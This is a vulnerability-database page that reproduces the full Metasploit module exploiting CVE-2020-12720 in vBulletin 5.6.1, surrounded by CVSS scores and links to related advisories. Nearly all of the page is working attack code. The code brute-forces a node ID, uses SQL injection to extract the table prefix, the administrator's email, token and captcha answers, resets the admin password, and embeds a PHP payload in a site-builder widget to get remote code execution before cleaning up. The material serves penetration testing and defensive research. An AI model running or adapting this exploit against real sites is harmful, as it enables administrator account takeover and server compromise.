Lucene search
0daydb.com0DAYDB:53D8E76BA26E5E7A0D38F61CC5944072HistoryJun 03, 2020 - 3:53 p.m.
vBulletin 5.6.1 CVE-2020-12720 - SQL Injection
2020-06-0315:53:27
0daydb.com
0daydb.com
357
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
This Metasploit module exploits a SQL injection vulnerability found in vBulletin versions 5.6.1
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }
def initialize(info = {})
super(
update_info(
info,
'Name' => 'vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in vBulletin 5.6.1 and earlier
This module uses the getIndexableContent vulnerability to reset the administrators password,
it then uses the administrators login information to achieve RCE on the target. This module
has been tested successfully on VBulletin Version 5.6.1 on Ubuntu Linux distribution.
},
'License' => MSF_LICENSE,
'Author' => [
'Charles Fol <folcharles[at]gmail.com>', # (@cfreal_) CVE
'Zenofex <zenofex[at]exploitee.rs>', # (@zenofex) PoC and Metasploit module
],
'References' => [
['CVE', '2020-12720'],
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [
['Automatic', {}]
],
'Privileged' => false,
'DisclosureDate' => '2020-03-12',
'DefaultTarget' => 0
)
)
register_options([
OptString.new('TARGETURI', [true, 'Path to vBulletin', '/']),
OptInt.new('NODE', [false, 'Valid Node ID']),
OptInt.new('MINNODE', [true, 'Valid Node ID', 1]),
OptInt.new('MAXNODE', [true, 'Valid Node ID', 200]),
OptBool.new('MANUALLOSTPASS', [false, 'true if an administrator lost password request has already been sent.', false])
])
end
# Performs SQLi attack
def do_sqli(node_id, tbl_prfx, field, table, condition)
where_cond = condition.nil? || condition == '' ? '' : "where #{condition}"
injection = " UNION ALL SELECT 0x2E,0x74,0x68,0x65,0x2E,0x65,0x78,0x70,0x6C,0x6F,0x69,0x74,0x65,0x65,0x72,0x73,0x2E,#{field},0x2E,0x7A,0x65,0x6E,0x6F,0x66,0x65,0x78 "
injection << "from #{tbl_prfx}#{table} #{where_cond}--"
print_status("Performing SQL injection on target to retrieve '#{field}' from '#{tbl_prfx}#{table}'.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'content_infraction', 'getIndexableContent'),
'vars_post' => {
'nodeId[nodeid]' => "#{node_id}#{injection}"
}
})
return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && parsed_resp['rawtext']
parsed_resp['rawtext']
end
# Gets human verification token
def get_hv_hash
print_status("Making request to '#{target_uri.path}/ajax/api/hv/generateToken' to retrieve HV token.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'hv', 'generateToken'),
'vars_post' => {
'securitytoken' => 'guest'
}
})
return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && parsed_resp['hash']
hv_hash = parsed_resp['hash']
print_good("Retrieved '#{hv_hash}' human verification token.")
hv_hash
end
# Gets the human verification (question based) answer
def get_hv_ques_answer(node_id, tbl_prfx, questionid)
print_status("Using HV token '#{questionid}' and SQLinjection to determine HV question answer.")
hv_answer = do_sqli(node_id, tbl_prfx, 'regex', 'hvquestion', "questionid = '#{questionid}'")
if questionid.nil?
return nil
end
print_good("Retrieved the answer '#{hv_answer}' (REGEX) to the HV question with id '#{questionid}'.")
hv_answer
end
# Gets the human verification (image based) answer
def get_hv_answer(node_id, tbl_prfx, hv_hash)
print_status("Using HV token '#{hv_hash}' and SQLinjection to determine HV answer.")
hv_answer = do_sqli(node_id, tbl_prfx, 'answer', 'humanverify', "hash = '#{hv_hash}'")
if hv_answer.nil?
return nil
end
print_good("Retrieved '#{hv_answer}' answer to HV token '#{hv_hash}'.")
hv_answer
end
# Gets the prefix to the SQL tables used in vbulletin install
def get_table_prefix(node_id)
print_status('Attempting to determine the vBulletin table prefix.')
table_name = do_sqli(node_id, '', 'table_name', 'information_schema.columns', "column_name='phrasegroup_cppermission'")
unless table_name && table_name.split('language').index
fail_with(Failure::Unknown, 'Could not determine the vBulletin table prefix.')
end
tbl_prefix = table_name.split('language')[0]
print_good("Sucessfully retrieved table to get prefix from #{table_name}.")
tbl_prefix
end
# Sends the request to begin forgot password request
def begin_reset_pass(admin_email, hv_answer, hv_hash, type = 'Image')
print_status("Making request to '#{target_uri.path}/auth/lostpw' to begin lost password process.")
if type == 'Question'
hv_field_name1 = 'humanverify[input]'
hv_field_name2 = 'humanverify[hash]'
elsif type == 'Recaptcha2'
hv_field_name1 = 'unused'
hv_field_name2 = 'humanverify[g-recaptcha-response]'
else
hv_field_name1 = 'humanverify[input]'
hv_field_name2 = 'humanverify[hash]'
end
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'auth', 'lostpw'),
'vars_post' => {
'email' => admin_email.to_s,
hv_field_name1.to_s => hv_answer.to_s,
hv_field_name2.to_s => hv_hash.to_s,
'securitytoken' => 'guest'
}
})
return false unless res && res.code == 200
parsed_resp = res.get_json_document
return false if parsed_resp['response'] && parsed_resp['response']['errors']
true
end
# Attempts to login to vBulletin install
def login(user, pass, type = '')
print_status("Making login request to '#{target_uri.path}/auth/ajax-login' with username: '#{user}' and password: '#{pass}'.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'auth', 'ajax-login'),
'vars_post' => {
'logintype': type.to_s,
'username' => user.to_s,
'password' => pass.to_s,
'securitytoken' => 'guest'
}
})
return [nil, nil] unless res && res.code == 200 && (parsed_resp = res.get_json_document) && parsed_resp['success']
print_good("Successfully logged in as #{user} #{type}.")
[res.get_cookies, parsed_resp['newtoken']]
end
# Gets an administrator's info from the database using SQLi
def get_admin_info(node_id, tbl_prefix)
uid = do_sqli(node_id, tbl_prefix, 'userid', 'administrator', nil)
username = do_sqli(node_id, tbl_prefix, 'username', 'user', "userid = '#{uid}'")
token = do_sqli(node_id, tbl_prefix, 'token', 'user', "userid = '#{uid}'")
email = do_sqli(node_id, tbl_prefix, 'email', 'user', "userid = '#{uid}'")
unless uid && username && token && email
return [nil, nil, nil, nil]
end
[uid, username, token, email]
end
# Activates vBulletin site builder
def activate_sitebuilder(pageid, nodeid, userid, sec_token, cookie_jar)
print_status("Making request to '#{target_uri.path}/ajax/activate-sitebuilder' to activate site-builder functionality.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ajax', 'activate-sitebuilder'),
'cookie' => [cookie_jar],
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => {
'pageid' => pageid.to_s,
'nodeid' => nodeid.to_s,
'userid' => userid.to_s,
'loadMenu' => 'false',
'isAjaxTemplateRender' => 'true',
'isAjaxTemplateRenderWithData' => 'true',
'securitytoken' => sec_token.to_s
}
})
return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && !parsed_resp['errors']
print_good('Successfully enabled site-builder functionality.')
true
end
# Creates new widget instance
def new_widget_instance(sec_token, cookie_jar)
print_status("Making request to '#{target_uri.path}/ajax/api/widget/saveNewWidgetInstance' to create new widget.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'widget', 'saveNewWidgetInstance'),
'cookie' => [cookie_jar],
'vars_post' => {
'containerinstanceid' => '0',
'widgetid' => '23', # PHP widget type ID
'pagetemplateid' => '',
'securitytoken' => sec_token.to_s
}
})
return [nil, nil] unless res && res.code == 200 && (parsed_resp = res.get_json_document) && parsed_resp['widgetinstanceid']
print_good('Created new widget instance.')
[parsed_resp['widgetinstanceid'], parsed_resp['pagetemplateid']]
end
# Saves a new widget to vBulletin.
def save_widget(pt_id, wi_id, payload, sec_token, cookie_jar)
print_status("Making request to '#{target_uri.path}/ajax/api/widget/saveAdminConfig' to add payload to widget.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'widget', 'saveAdminConfig'),
'cookie' => [cookie_jar],
'vars_post' => {
'widgetid' => '23', # PHP widget type ID
'pagetemplateid' => pt_id.to_s,
'widgetinstanceid' => wi_id.to_s,
'data[widget_type]' => '',
'data[title]' => rand_text_alphanumeric(rand(6..16)),
'data[show_at_breakpoints][desktop]' => '1',
'data[show_at_breakpoints][small]' => '1',
'data[show_at_breakpoints][xsmall]' => '1',
'data[hide_title]' => '1',
'data[module_viewpermissions][key]' => 'show_all',
'data[code]' => payload.encoded.to_s,
'securitytoken' => sec_token.to_s
}
})
return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && !parsed_resp['errors']
print_good('Successfully added payload to widget.')
true
end
# Sends request to reset password using activation id.
def reset_password(admin_uid, act_id, new_pass)
print_status("Sending reset password request to '#{target_uri.path}/auth/reset-password'.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'auth', 'reset-password'),
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => {
'userid' => admin_uid.to_s,
'activationid' => act_id.to_s,
'new-password' => new_pass.to_s,
'new-password-confirm' => new_pass.to_s,
'securitytoken' => 'guest'
}
})
unless res && res.code == 200 && res.body.to_s =~ /Logging in/
return nil
end
print_good("User with userid '#{admin_uid}' successfully reset password to '#{new_pass}'.")
true
end
# Deletes a page in vbulletin
def delete_page(pageid, login_token, cookie_jar)
print_status("Sending delete page request to '#{target_uri.path}/ajax/api/page/delete'.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'page', 'delete'),
'cookie' => [cookie_jar],
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => {
'pageid' => pageid.to_s,
'securitytoken' => login_token.to_s
}
})
return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && !parsed_resp['errors']
print_good("Successfully deleted page with pageid: #{pageid}")
true
end
# Makes request to execute PHP payload.
def exec_payload(rest_url)
print_status("Sending request to '#{normalize_uri(target_uri.path, rest_url)}' to execute payload.")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, rest_url)
})
unless res && res.code == 200
return nil
end
print_good('Request made succesfully, payload should be executing now.')
true
end
# Fetches a human verification question based on hash.
def get_hv_question(hash)
print_status("Sending request to '#{target_uri.path}/ajax/api/hv/fetchHvQuestion' to get human verification question.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'hv', 'fetchHvQuestion'),
'vars_post' => {
'hash' => hash.to_s
}
})
unless res && res.code == 200 && res.body.to_s !~ /"errors"/
return nil
end
res.body.to_s.tr('"', '')
end
# Saves a new page to the vBulletin install
def save_page(nodeid, userid, pt_id, payload_url, wi_id, session_info)
print_status("Sending request to '#{target_uri.path}/admin/savepage' to save new page at '#{payload_url}'.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'savepage'),
'cookie' => [session_info[1]],
'vars_post' => {
'input[ishomeroute]' => '0',
'input[pageid]' => '0',
'input[nodeid]' => nodeid.to_s,
'input[userid]' => userid.to_s,
'input[screenlayoutid]' => '2',
'input[templatetitle]' => rand_text_alphanumeric(rand(5..10)),
'input[displaysections[0]]' => '[]',
'input[displaysections[1]]' => '[]',
'input[displaysections[2]]' => "[{\"widgetId\":\"23\",\"widgetInstanceId\":\"#{wi_id}\"}]",
'input[displaysections[3]]' => '[]',
'input[pagetitle]' => rand_text_alphanumeric(rand(5..10)),
'input[resturl]' => payload_url.to_s,
'input[metadescription]' => rand_text_alphanumeric(rand(5..10)),
'input[pagetemplateid]' => pt_id.to_s,
'url' => normalize_uri(target_uri.path),
'securitytoken' => session_info[0].to_s
}
})
return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && parsed_resp['success']
print_good("Page succesfully created and should be accessible at '#{normalize_uri(target_uri.path, payload_url.to_s)}'.")
parsed_resp['pageid']
end
# Gets human verification type (options: "Question" | "Image" | Recaptcha2 | "Disabled")
def get_hv_type
print_status("Sending request to '#{target_uri.path}/ajax/api/hv/fetchHvType' to get human verification type.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'hv', 'fetchHvType')
})
unless res && res.code == 200
return nil
end
hv_type = res.body.to_s.tr('"', '')
print_good("Retrieved HV/captcha type of '#{hv_type}'.")
hv_type.to_s.tr("'", '')
end
# Brute force a nodeid (attack requires a valid nodeid)
def brute_force_node
min = datastore['MINNODE']
max = datastore['MAXNODE']
if min > max
print_error("MINNODE can't be major than MAXNODE.")
return nil
end
for node_id in min..max
if exists_node?(node_id)
return node_id
end
end
nil
end
# Checks if a nodeid is valid
def exists_node?(id)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'node', 'getNode'),
'vars_post' => {
'nodeid' => id.to_s
}
})
unless res && res.code == 200
return nil
end
return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && !parsed_resp['errors']
print_good("Sucessfully found node at id #{id}")
true
end
# Gets a node through BF or user supplied value
def get_node
if datastore['NODE'].nil? || datastore['NODE'] <= 0
print_status('Brute forcing to find a valid node id.')
return brute_force_node
end
print_status("Checking node id '#{datastore['NODE']}'.")
return datastore['NODE'] if exists_node?(datastore['NODE'])
nil
end
# Check function for exploit
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'js', 'login.js')
})
return CheckCode::Unknown unless res && res.code == 200
return CheckCode::Safe if res.body.to_s =~ /vBulletin 5\.6\.1 Patch Level 1/
if res.body.to_s =~ /vBulletin ([\.0-9]+)/
if Gem::Version.new(Regexp.last_match(1)) > Gem::Version.new('5.6.1')
return CheckCode::Safe
elsif Gem::Version.new(Regexp.last_match(1)) > Gem::Version.new('5.0.0')
return CheckCode::Appears
end
return CheckCode::Detected
end
CheckCode::Safe
end
# Performs all exploit functionality
def exploit
super
# Get node_id for requests
node_id = get_node
fail_with(Failure::Unknown, 'Could not get a valid node id for the vBulletin install.') unless node_id
# Get vBulletin table prefix
table_prfx = get_table_prefix(node_id)
fail_with(Failure::UnexpectedReply, 'Could not determine the table prefix for the vBulletin install.') unless table_prfx
# Get admin info (email, uid, token)
admin_uid, admin_user, admin_token, admin_email = get_admin_info(node_id, table_prfx)
unless admin_uid && admin_user && admin_token && admin_email
fail_with(Failure::UnexpectedReply, 'Could not retrieve administrator uid, username, email and token.')
end
print_good("Retrieved administrator uid: #{admin_uid} user: #{admin_user} email: #{admin_email} and password: #{admin_token}")
if !datastore['MANUALLOSTPASS']
# Determine HV type
hv_type = get_hv_type
fail_with(Failure::Unknown, 'Invalid human verification type, you must request a new password for the administrator manually (and set MANUALLOSTPASS).') unless ['Image', 'Question', 'Recaptcha2', 'Disabled'].include? hv_type
fail_with(Failure::Unknown, "Site uses Recaptcha2, retry with MANUALLOSTPASS enabled and after a lost password request to an administrator account (#{admin_email})") unless ['Recaptcha2', 'Disabled'].exclude? hv_type
# Generate HV token and get answer
if hv_type == 'Image' && hv_type != 'Disabled'
hv_hash = get_hv_hash
hv_answer = get_hv_answer(node_id, table_prfx, hv_hash)
fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification hash or answer.') unless hv_hash && hv_answer
elsif hv_type == 'Question' && hv_type != 'Disabled'
hv_hash = get_hv_hash
fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification question hash.') unless hv_hash
ques_id = get_hv_answer(node_id, table_prfx, hv_hash)
fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification question id.') unless ques_id
hv_question = get_hv_question(hv_hash)
hv_answer = get_hv_ques_answer(node_id, table_prfx, ques_id)
fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification question or answer.') unless hv_question && hv_answer
print_good("Retrieved the HV question '#{hv_question}' and answer '#{hv_answer}' (regex).")
end
# Make request to forget my password
brp_ret = begin_reset_pass(admin_email, hv_answer, hv_hash, hv_type)
# We fail here when the answer to the HV question contains a complex regex or is recaptcha2
fail_with(Failure::Unknown, 'Site requires captcha that we cannot bypass.') unless brp_ret
end
# Get Activation ID for forgot password request from DB
activation_id = do_sqli(node_id, table_prfx, 'activationid', 'useractivation', "userid = '#{admin_uid}'")
fail_with(Failure::UnexpectedReply, 'Could not retrieve activation id for forgot password request.') unless activation_id
# Make request setting new password
new_pass = rand_text_alphanumeric(rand(10..16))
rp_ret = reset_password(admin_uid, activation_id, new_pass)
fail_with(Failure::UnexpectedReply, "Error attempting to reset password with activation id '#{activation_id}'.") unless rp_ret
# Login to vBulletin
cookie_jar, login_token = login(admin_user, new_pass)
fail_with(Failure::NoAccess, "Could not login with username: '#{admin_user}' and password: '#{new_pass}'.") unless login_token
# Activate Site Builder (is this necessary?!)
actsb_ret = activate_sitebuilder(1, node_id, admin_uid, login_token, cookie_jar)
fail_with(Failure::UnexpectedReply, 'Could not activate site builder.') unless actsb_ret
# Login to vBulletin
cookie_jar, login_token = login(admin_user, new_pass, 'cplogin')
fail_with(Failure::NoAccess, "Could not login to CP with username: '#{admin_user}' and password: '#{new_pass}'.") unless login_token
# Create new widget
wi_id, pt_id = new_widget_instance(login_token, cookie_jar)
fail_with(Failure::UnexpectedReply, 'Could not create new widget instance.') unless wi_id && pt_id
# Save modifications to widget
sw_ret = save_widget(pt_id, wi_id, payload, login_token, cookie_jar)
fail_with(Failure::UnexpectedReply, 'Could not save payload modifications into widget instance.') unless sw_ret
# Add page with widget embedded
payload_url = rand_text_alphanumeric(rand(6..10))
session_info = [login_token, cookie_jar]
page_id = save_page(node_id, admin_uid, pt_id, payload_url, wi_id, session_info)
fail_with(Failure::UnexpectedReply, 'Could not save newly created page with malicious widget.') unless page_id
# Execute php payload
print_good("Executing PHP payload (#{payload.encoded.length} bytes) at #{normalize_uri(target_uri.path, payload_url)}.")
exec_payload(payload_url)
# Delete page with widget embedded within it
dp_ret = delete_page(page_id, login_token, cookie_jar)
print_bad('Could not delete page (cleanup phase).') unless dp_ret
end
endRelated
0daydb
0daydb
vCloud Director 9.7.0.15498291 CVE-2020-3956 - Remote Code Execution
2020-06-03 15:54:57
QuickBox Pro 2.1.8 CVE-2020-13448 - Remote Code Execution
2020-06-03 15:51:53
VMWare vCloud Director 9.7.0.15498291 - Remote Code Execution
2020-06-06 15:10:05
checkpoint_advisories
checkpoint_advisories
vBulletin nodeId SQL Injection (CVE-2020-12720)
2020-05-18 00:00:00
HTTP Suspicious Linux Etc Paths (CVE-2020-13448)
2020-05-14 00:00:00
QuickBox Remote Code Execution (CVE-2020-13448)
2020-06-21 00:00:00
osv
osv
prion
prion
Improper access control
2020-05-08 00:15:00
Command injection
2020-06-01 16:15:00
Remote code execution
2020-05-20 14:15:00
thn
thn
An Undisclosed Critical Vulnerability Affect vBulletin Forums — Patch Now
2020-05-11 19:11:00
Critical VMware Cloud Director Flaw Lets Hackers Take Over Corporate Servers
2020-06-02 04:00:00
dsquare
dsquare
vBulletin 5 SQL Injection
2020-06-25 00:00:00
cve
cve
packetstorm
packetstorm
QuickBox Pro 2.1.8 Remote Code Execution
2020-06-02 00:00:00
vBulletin 5.6.1 SQL Injection
2020-05-15 00:00:00
vBulletin 5.6.1 SQL Injection
2020-06-02 00:00:00
zdt
zdt
QuickBox Pro 2.1.8 - Authenticated Remote Code Execution Exploit
2020-06-01 00:00:00
vBulletin 5.6.1 SQL Injection Exploit
2020-06-02 00:00:00
VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution Exploit
2020-06-08 00:00:00
nuclei
nuclei
vBulletin SQL Injection
2020-05-21 21:47:20
openvas
openvas
vBulletin < 5.6.1 Security Patch Level 1 Vulnerability
2020-05-11 00:00:00
nessus
nessus
githubexploit
githubexploit
Exploit for Expression Language Injection in Vmware Vcloud Director
2020-06-01 18:26:32
attackerkb
attackerkb
CVE-2020-12720 vBulletin incorrect access control
2020-05-08 00:00:00
CVE-2020-3956: VMware Cloud Director Code Injection Vulnerability
2020-05-20 00:00:00
vmware
vmware
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
Related for 0DAYDB:53D8E76BA26E5E7A0D38F61CC5944072